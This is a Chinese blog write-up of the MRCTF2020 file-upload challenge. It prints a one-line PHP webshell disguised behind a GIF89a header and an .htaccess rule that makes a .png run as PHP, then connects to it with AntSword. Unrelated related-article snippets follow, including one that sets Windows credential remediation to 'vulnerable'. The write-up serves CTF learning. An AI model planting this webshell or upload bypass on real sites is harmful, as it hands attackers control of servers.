[MRCTF2020]你传你呢 1

embedded/2024/9/22 18:18:49/

上传一个文件 图片木马

  1. 新建一个图片木马,这里我命名为a.php,名字需和待会上传的.htaccess一致
GIF89a
<script language='php'>eval($_REQUEST["cmd"])</script>

在这里插入图片描述

  1. 抓包上传的a.php文件,修改两个地方
    在这里插入图片描述
    在这里插入图片描述

  2. 新建一个.htaccess文件,并上传,抓包该文件修改文件类型为image/png
    <FilesMatch "a.png"> SetHandler application/x-httpd-php </FilesMatch>在这里插入图片描述
    在这里插入图片描述

  3. 然后用蚁剑连刚才上传的a.png文件即可。flag放在根路径。


http://www.ppmy.cn/embedded/29816.html

相关文章

远程桌面报错:【出现验证错误。要求的函数不受支持】

WinR 输入【gpedit.msc】回车 依次打开 计算机配置----管理模板-----系统-----凭据分配---加密数据库修正 选择【已启用】&#xff0c;下拉菜单选择【易受攻击】

该拥有一个去中心化身份了

本文的目的是教你如何拥有一个去中心化的身份。 进入域名 https://app.ens.domains, 输入想要注册的域名身份 进入下一步&#xff0c;选择注册时长&#xff0c;时长越高网络费用越低&#xff0c;可选择以太坊ETH付费 OK,点击连接选择自己的钱包付款即可 欢迎关注公众号 算法…

前端高并发的出现场景及解决方法——技能提升——p-limit的使用

最近在写后台管理系统的时候&#xff0c;遇到一个场景&#xff0c;就是打印的页面需要根据传入的多个id&#xff0c;分别去请求详情接口。 比如id有10个&#xff0c;则需要调用10次详情接口获取到数据&#xff0c;最后对所有的数据进行整合后页面渲染。 相信大家或多或少都遇到…

https网站安全证书的作用与免费申请办法

HTTPS网站安全证书&#xff0c;也称为SSL证书&#xff0c;网站通过申请SSL证书将http协议升级到https协议 HTTPS网站安全证书的作用 1 增强用户信任&#xff1a;未使用https协议的网站&#xff0c;用户访问时浏览器会有“不安全”弹窗提示 2 提升SEO排名&#xff1a;搜索引擎…

如何基于nginx搭建https网站

华子目录 使用nginx的http_ssl模块建立加密传输的网站查看配置文件ssl配置文件的主要参数实验&#xff1a;搭建nginxssl加密认证的web服务器 使用nginx的http_ssl模块建立加密传输的网站 查看 [rootserver ~]# nginx -V #查看是否有--with-http_ssl_module模块&#xff0c;如…

Django框架之视图层

一、三板斧的原理介绍 1、HttpResponse 在Django中&#xff0c;HttpResponse是一个类&#xff0c;用于构建HTTP响应并返回给客户端。当视图函数处理完请求后&#xff0c;需要返回一个响应时&#xff0c;就会使用HttpResponse对象。 &#xff08;1&#xff09;创建HttpRespon…

国产服务器操作系统部署NTP服务 _ 统信UOS _ 麒麟 _ 中科方德

原文链接&#xff1a;国产服务器操作系统部署NTP服务 | 统信UOS | 麒麟 | 中科方德 Hello&#xff0c;大家好啊&#xff01;在保持服务器时间的精确同步方面&#xff0c;时间同步服务器&#xff08;NTP服务器&#xff09;扮演着至关重要的角色&#xff0c;它能确保系统操作的时…

万界星空科技商业开源MES+项目合作+商业开源低代码平台

今天我想和大家分享的是一套商业开源的 MES制造执行管理系统带源码。对于制造业而言&#xff0c;MES 是一个至关重要的系统&#xff0c;它可以帮助企业提高生产效率、优化资源利用、提高产品质量&#xff0c;从而增强市场竞争力。 什么是 MES&#xff1f; MES 是指通过计算机技…